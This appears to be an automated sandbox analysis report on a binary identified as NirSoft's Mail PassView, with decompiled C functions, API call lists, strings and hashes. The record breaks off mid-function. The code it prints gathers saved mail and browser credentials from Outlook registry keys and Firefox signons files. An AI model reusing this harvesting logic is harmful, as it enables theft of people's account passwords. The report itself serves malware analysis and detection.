				void* __ebx;
				void* __esi;
				void* _t36;
				void* _t37;
				void* _t48;
				void* _t55;
				intOrPtr* _t56;
				signed int _t58;
				intOrPtr* _t63;
				void* _t70;
				void* _t71;

				_t56 = __ecx;
				E004118A0(0x1048, __ecx);
				_t63 = _t56;
				_v8 = _t63;
				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t71 = _t70 + 0x2c;
				if( *0x417308 != 0) {
					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
					_t71 = _t71 + 0xc;
				}
				if( *0x417304 != 0) {
					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
				}
				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t58 = 0x10;
				_push(_t36);
				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
				E00405EFD(_a4,  &_v4172);
				_push("Mail PassView");
				_t55 = 6;
				_push(E004078FF(_t55));
				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_t48 = E00405EFD(_a4,  &_v2124);
				_t78 = _a8 - 4;
				if(_a8 == 4) {
					return E004097E6(_v8, _t78, _a4);
				}
				return _t48;
			}























                                                                        0x00403e87
                                                                        0x00403e8f
                                                                        0x00403e9f
                                                                        0x00403ea1
                                                                        0x00403ea4
                                                                        0x00403eb9
                                                                        0x00403ebf
                                                                        0x00403ecd
                                                                        0x00403ed3
                                                                        0x00403ee1
                                                                        0x00403ee7
                                                                        0x00403eec
                                                                        0x00403ef5
                                                                        0x00403f08
                                                                        0x00403f0d
                                                                        0x00403f0d
                                                                        0x00403f16
                                                                        0x00403f24
                                                                        0x00403f2a
                                                                        0x00403f2f
                                                                        0x00403f34
                                                                        0x00403f35
                                                                        0x00403f3e
                                                                        0x00403f5a
                                                                        0x00403f5b
                                                                        0x00403f6a
                                                                        0x00403f72
                                                                        0x00403f79
                                                                        0x00403f7f
                                                                        0x00403f8c
                                                                        0x00403f9b
                                                                        0x00403fa3
                                                                        0x00403fa7
                                                                        0x00000000
                                                                        0x00403faf
                                                                        0x00403fb8

                                                                        APIs
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                        • memset.MSVCRT ref: 00403EBF
                                                                        • memset.MSVCRT ref: 00403ED3
                                                                        • memset.MSVCRT ref: 00403EE7
                                                                        • sprintf.MSVCRT ref: 00403F08
                                                                        • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                                        • sprintf.MSVCRT ref: 00403F5B
                                                                        • sprintf.MSVCRT ref: 00403F8C
                                                                        Strings
                                                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                                        • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                                        • Mail PassView, xrefs: 00403F72
                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                                        • API String ID: 1043021993-495024357
                                                                        • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                        • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                                        • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                        • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404288, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
				intOrPtr _v8;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				wchar_t* _t23;
				char* _t41;
				wchar_t** _t59;
				void* _t76;

				_t76 = __fp0;
				_t59 = _a4;
				_t23 =  *_t59;
				_v8 = __ecx;
				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
					E004021D8( &_v940);
					_v800 = 7;
					_v412 = 3;
					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
					strcpy( &_v928,  &_v408);
					strcpy( &_v796,  &_v408);
					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
						sprintf( &_v796, "%s@gmail.com",  &_v408);
					}
					_t41 = strchr( &_v928, 0x40);
					if(_t41 != 0) {
						 *_t41 = 0;
					}
					E00402407( &_v940, _t76, _v8 + 0xfffff788);
				}
				return 1;
			}















                                                                        0x00404288
                                                                        0x00404293
                                                                        0x00404296
                                                                        0x0040429c
                                                                        0x0040429f
                                                                        0x004042d3
                                                                        0x004042ee
                                                                        0x004042fa
                                                                        0x00404304
                                                                        0x00404318
                                                                        0x00404328
                                                                        0x0040433b
                                                                        0x00404354
                                                                        0x0040437e
                                                                        0x00404383
                                                                        0x0040438f
                                                                        0x00404398
                                                                        0x0040439a
                                                                        0x0040439a
                                                                        0x004043ab
                                                                        0x004043ab
                                                                        0x004043b6

                                                                        APIs
                                                                        • wcsstr.MSVCRT ref: 004042BD
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                                        • strcpy.MSVCRT(?,?), ref: 00404328
                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                                        • strchr.MSVCRT ref: 00404349
                                                                        • strlen.MSVCRT ref: 0040435D
                                                                        • sprintf.MSVCRT ref: 0040437E
                                                                        • strchr.MSVCRT ref: 0040438F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                        • String ID: %s@gmail.com$www.google.com
                                                                        • API String ID: 1359934567-4070641962
                                                                        • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                        • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                                        • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                        • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040827A, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
				void _v4103;
				char _v4104;
				int _t21;
				int _t28;
				void* _t35;

				_t35 = __eflags;
				E004118A0(0x1004, __ecx);
				strcpy(0x4171b8, _a8);
				strcpy(0x4172c0, "general");
				E00407E55(_t35, "TranslatorName", 0x412466);
				E00407E55(_t35, "TranslatorURL", 0x412466);
				EnumResourceNamesA(_a4, 4, E004080A3, 0);
				EnumResourceNamesA(_a4, 5, E004080A3, 0);
				strcpy(0x4172c0, "strings");
				_t28 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
					if(_t21 > 0) {
						_t21 = E00407EC3(_t28,  &_v4104);
					}
					_t28 = _t28 + 1;
				} while (_t28 <= 0xffff);
				 *0x4171b8 = 0;
				return _t21;
			}








                                                                        0x0040827a
                                                                        0x00408282
                                                                        0x00408292
                                                                        0x004082a2
                                                                        0x004082b2
                                                                        0x004082bd
                                                                        0x004082d8
                                                                        0x004082e2
                                                                        0x004082ea
                                                                        0x004082f5
                                                                        0x004082ff
                                                                        0x00408306
                                                                        0x0040830e
                                                                        0x0040831a
                                                                        0x00408322
                                                                        0x0040832c
                                                                        0x00408332
                                                                        0x00408333
                                                                        0x00408334
                                                                        0x0040833e
                                                                        0x00408347

                                                                        APIs
                                                                        • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                                        • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                                          • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                                          • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                                          • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                                        • EnumResourceNamesA.KERNEL32(00000104,00000004,004080A3,00000000), ref: 004082D8
                                                                        • EnumResourceNamesA.KERNEL32(00000104,00000005,004080A3,00000000), ref: 004082E2
                                                                        • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                                        • memset.MSVCRT ref: 00408306
                                                                        • LoadStringA.USER32 ref: 0040831A
                                                                          • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                                                        • API String ID: 1060401815-3647959541
                                                                        • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                        • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                                        • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                        • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040D1EC, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t31;
				int _t40;
				void* _t44;
				void* _t49;
				char* _t50;
				void* _t57;
				int _t62;
				char* _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				intOrPtr* _t86;
				char* _t89;
				void* _t90;
				char** _t91;

				_t86 = __eax;
				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
				_t94 = _t31;
				if(_t31 == 0) {
					__eflags = 0;
					return 0;
				}
				E0040462E(_t86 + 0x468);
				_t68 = _t86 + 0x158;
				E004061FF(_t68, _a4);
				_t89 = _t86 + 0x25d;
				 *_t89 = 0;
				E0040C530(_t94, _t86 + 0x18);
				if( *_t89 == 0) {
					_t62 = strlen(_t68);
					 *_t91 = "signons.txt";
					_t9 = strlen(??) + 1; // 0x1
					if(_t62 + _t9 >= 0x104) {
						 *_t89 = 0;
					} else {
						E004062AD(_t89, _t86 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t40 = strlen(_t86 + 0x158);
				_t91[3] = "signons.sqlite";
				_t15 = strlen(??) + 1; // 0x1
				_pop(_t73);
				if(_t40 + _t15 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
					_pop(_t73);
				}
				_t98 =  *_t89;
				if( *_t89 != 0) {
					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
					_t99 = _t57;
					if(_t57 != 0) {
						E0040C475(_t73, _t86, _t99);
					}
				}
				_t44 = E0040614B( &_v268);
				_t100 = _t44;
				_pop(_t74);
				if(_t44 != 0) {
					E0040CE28(_t74, _t100, _t86,  &_v268);
				}
				_t70 = 0;
				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
					L19:
					return 1;
				} else {
					do {
						_t90 = E0040D438(_t70, _t86 + 0x468);
						_t24 = _t90 + 0x504; // 0x504
						_t49 = _t24;
						_push("none");
						_push(_t49);
						L004115B2();
						if(_t49 != 0) {
							_t25 = _t90 + 4; // 0x4
							_t50 = _t25;
							if( *_t50 == 0) {
								_t26 = _t90 + 0x204; // 0x204
								strcpy(_t50, _t26);
							}
							 *((intOrPtr*)( *_t86 + 4))(_t90);
						}
						_t70 = _t70 + 1;
					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
					goto L19;
				}
			}






















                                                                        0x0040d1fb
                                                                        0x0040d200
                                                                        0x0040d205
                                                                        0x0040d207
                                                                        0x0040d371
                                                                        0x00000000
                                                                        0x0040d371
                                                                        0x0040d213
                                                                        0x0040d21b
                                                                        0x0040d223
                                                                        0x0040d22c
                                                                        0x0040d233
                                                                        0x0040d236
                                                                        0x0040d23e
                                                                        0x0040d241
                                                                        0x0040d248
                                                                        0x0040d254
                                                                        0x0040d25e
                                                                        0x0040d277
                                                                        0x0040d260
                                                                        0x0040d26e
                                                                        0x0040d274
                                                                        0x0040d25e
                                                                        0x0040d288
                                                                        0x0040d28f
                                                                        0x0040d29e
                                                                        0x0040d2a5
                                                                        0x0040d2b1
                                                                        0x0040d2ba
                                                                        0x0040d2bb
                                                                        0x0040d2d8
                                                                        0x0040d2bd
                                                                        0x0040d2cf
                                                                        0x0040d2d5
                                                                        0x0040d2d5
                                                                        0x0040d2df
                                                                        0x0040d2e2
                                                                        0x0040d2e8
                                                                        0x0040d2ed
                                                                        0x0040d2ef
                                                                        0x0040d2f1
                                                                        0x0040d2f1
                                                                        0x0040d2ef
                                                                        0x0040d2fd
                                                                        0x0040d302
                                                                        0x0040d304
                                                                        0x0040d305
                                                                        0x0040d30f
                                                                        0x0040d30f
                                                                        0x0040d314
                                                                        0x0040d31c
                                                                        0x0040d36c
                                                                        0x00000000
                                                                        0x0040d31e
                                                                        0x0040d31e
                                                                        0x0040d32b
                                                                        0x0040d32d
                                                                        0x0040d32d
                                                                        0x0040d333
                                                                        0x0040d338
                                                                        0x0040d339
                                                                        0x0040d342
                                                                        0x0040d344
                                                                        0x0040d344
                                                                        0x0040d34a
                                                                        0x0040d34c
                                                                        0x0040d354
                                                                        0x0040d35a
                                                                        0x0040d360
                                                                        0x0040d360
                                                                        0x0040d363
                                                                        0x0040d364
                                                                        0x00000000
                                                                        0x0040d31e

                                                                        APIs
                                                                          • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                          • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                          • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                          • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                          • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                          • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                          • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                          • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                          • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                          • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                                        • strlen.MSVCRT ref: 0040D241
                                                                        • strlen.MSVCRT ref: 0040D24F
                                                                          • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                          • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                        • memset.MSVCRT ref: 0040D28F
                                                                        • strlen.MSVCRT ref: 0040D29E
                                                                        • strlen.MSVCRT ref: 0040D2AC
                                                                        • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                                        • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                        • String ID: none$signons.sqlite$signons.txt
                                                                        • API String ID: 2681923396-1088577317
                                                                        • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                        • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                                        • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                        • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402C44, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				void _v275;
				char _v276;
				void _v1299;
				char _v1300;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t40;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t64;
				char* _t66;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t83;

				_t83 = __fp0;
				_t64 = __ecx;
				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
				_t74 = _t73 + 0xc;
				if(_t35 == 0) {
					_v12 = 0;
					_v276 = 0;
					memset( &_v275, 0, 0xff);
					_t40 = E0040EC05(_v8, 0,  &_v276);
					_t75 = _t74 + 0x18;
					if(_t40 == 0) {
						_t66 = "%s\\%s";
						do {
							_t69 = _a4;
							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
							_v1300 = 0;
							memset( &_v1299, 0, 0x3ff);
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
							_t76 = _t75 + 0x3c;
							_t80 = _t52;
							if(_t52 == 0) {
								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
							}
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
							}
							_v12 = _v12 + 1;
							_t60 = E0040EC05(_v8, _v12,  &_v276);
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);
					}
					RegCloseKey(_v8);
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;
				return _t36;
			}


























                                                                        0x00402c44
                                                                        0x00402c44
                                                                        0x00402c5c
                                                                        0x00402c61
                                                                        0x00402c68
                                                                        0x00402c7b
                                                                        0x00402c7e
                                                                        0x00402c84
                                                                        0x00402c94
                                                                        0x00402c99
                                                                        0x00402c9e
                                                                        0x00402ca6
                                                                        0x00402cab
                                                                        0x00402cab
                                                                        0x00402cc6
                                                                        0x00402cd8
                                                                        0x00402cde
                                                                        0x00402cf7
                                                                        0x00402d0a
                                                                        0x00402d0f
                                                                        0x00402d12
                                                                        0x00402d14
                                                                        0x00402d1c
                                                                        0x00402d1c
                                                                        0x00402d35
                                                                        0x00402d48
                                                                        0x00402d4d
                                                                        0x00402d50
                                                                        0x00402d52
                                                                        0x00402d5c
                                                                        0x00402d5c
                                                                        0x00402d61
                                                                        0x00402d71
                                                                        0x00402d76
                                                                        0x00402d79
                                                                        0x00402d82
                                                                        0x00402d86
                                                                        0x00402d86
                                                                        0x00402d8c
                                                                        0x00402d8f
                                                                        0x00402d97

                                                                        APIs
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        • memset.MSVCRT ref: 00402C84
                                                                          • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                          • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                        • memset.MSVCRT ref: 00402CDE
                                                                        • sprintf.MSVCRT ref: 00402CF7
                                                                        • sprintf.MSVCRT ref: 00402D35
                                                                          • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                          • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Closememset$sprintf$EnumOpen
                                                                        • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                        • API String ID: 1831126014-3814494228
                                                                        • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                        • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                                        • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                        • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040B53C, Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t45;
				intOrPtr _t50;
				signed int _t53;
				intOrPtr _t82;
				signed char _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				void* _t92;

				_t84 = __ecx;
				_t88 = _a4;
				_t92 = _t88 - 0x402;
				_t91 = __ecx;
				if(_t92 > 0) {
					_t45 = _t88 - 0x415;
					__eflags = _t45;
					if(_t45 == 0) {
						E0040A4C8(__ecx);
						L22:
						__eflags = 0;
						E0040A27F(0, _t84, _t91, 0);
						L23:
						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
							_t81 = _a12;
							_t86 =  *(_a12 + 0xc);
							_t50 =  *((intOrPtr*)(_t91 + 0x370));
							if((_t86 & 0x00000008) == 0) {
								__eflags = _t86 & 0x00000040;
								if((_t86 & 0x00000040) != 0) {
									 *0x4171ac =  *0x4171ac & 0x00000000;
									__eflags =  *0x4171ac;
									SetFocus( *(_t50 + 0x184));
								}
							} else {
								E00409D7E(_t50, _t81);
							}
						}
						return E004019AC(_t91, _t88, _a8, _a12);
					}
					_t53 = _t45 - 1;
					__eflags = _t53;
					if(_t53 == 0) {
						E0040A56C(__ecx);
						goto L22;
					}
					__eflags = _t53 == 6;
					if(_t53 == 6) {
						SetFocus( *(__ecx + 0x378));
					}
					goto L23;
				}
				if(_t92 == 0) {
					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
					E0040A437(__ecx);
					goto L22;
				}
				if(_t88 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
					} else {
						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
					}
					goto L23;
				}
				if(_t88 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L23;
					}
					SetCursor(LoadCursorA( *0x416b94, 0x67));
					return 1;
				}
				if(_t88 == 0x2b) {
					_t82 = _a12;
					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t82 + 0x18), 1);
						SetTextColor( *(_t82 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t90 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
						SelectObject( *(_t90 + 0x18), _v8);
						_t88 = _a4;
					}
				} else {
					if(_t88 == 0x7b) {
						_t87 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
							E0040B372(__ecx, _t87);
						}
					}
				}
				goto L23;
			}


















                                                                        0x0040b53c
                                                                        0x0040b545
                                                                        0x0040b54d
                                                                        0x0040b54f
                                                                        0x0040b551
                                                                        0x0040b689
                                                                        0x0040b689
                                                                        0x0040b68e
                                                                        0x0040b6b1
                                                                        0x0040b6b6
                                                                        0x0040b6b6
                                                                        0x0040b6b8
                                                                        0x0040b6bd
                                                                        0x0040b6c3
                                                                        0x0040b6c5
                                                                        0x0040b6c8
                                                                        0x0040b6ce
                                                                        0x0040b6d4
                                                                        0x0040b6dd
                                                                        0x0040b6e0
                                                                        0x0040b6e8
                                                                        0x0040b6e8
                                                                        0x0040b6ef
                                                                        0x0040b6ef
                                                                        0x0040b6d6
                                                                        0x0040b6d6
                                                                        0x0040b6d6
                                                                        0x0040b6d4
                                                                        0x00000000
                                                                        0x0040b6fe
                                                                        0x0040b690
                                                                        0x0040b690
                                                                        0x0040b691
                                                                        0x0040b6a8
                                                                        0x00000000
                                                                        0x0040b6a8
                                                                        0x0040b693
                                                                        0x0040b696
                                                                        0x0040b69e
                                                                        0x0040b69e
                                                                        0x00000000
                                                                        0x0040b696
                                                                        0x0040b557
                                                                        0x0040b679
                                                                        0x0040b680
                                                                        0x00000000
                                                                        0x0040b680
                                                                        0x0040b560
                                                                        0x0040b651
                                                                        0x0040b654
                                                                        0x0040b671
                                                                        0x0040b656
                                                                        0x0040b663
                                                                        0x0040b663
                                                                        0x00000000
                                                                        0x0040b654
                                                                        0x0040b569
                                                                        0x0040b626
                                                                        0x0040b62c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040b641
                                                                        0x00000000
                                                                        0x0040b649
                                                                        0x0040b572
                                                                        0x0040b59e
                                                                        0x0040b5a4
                                                                        0x0040b5aa
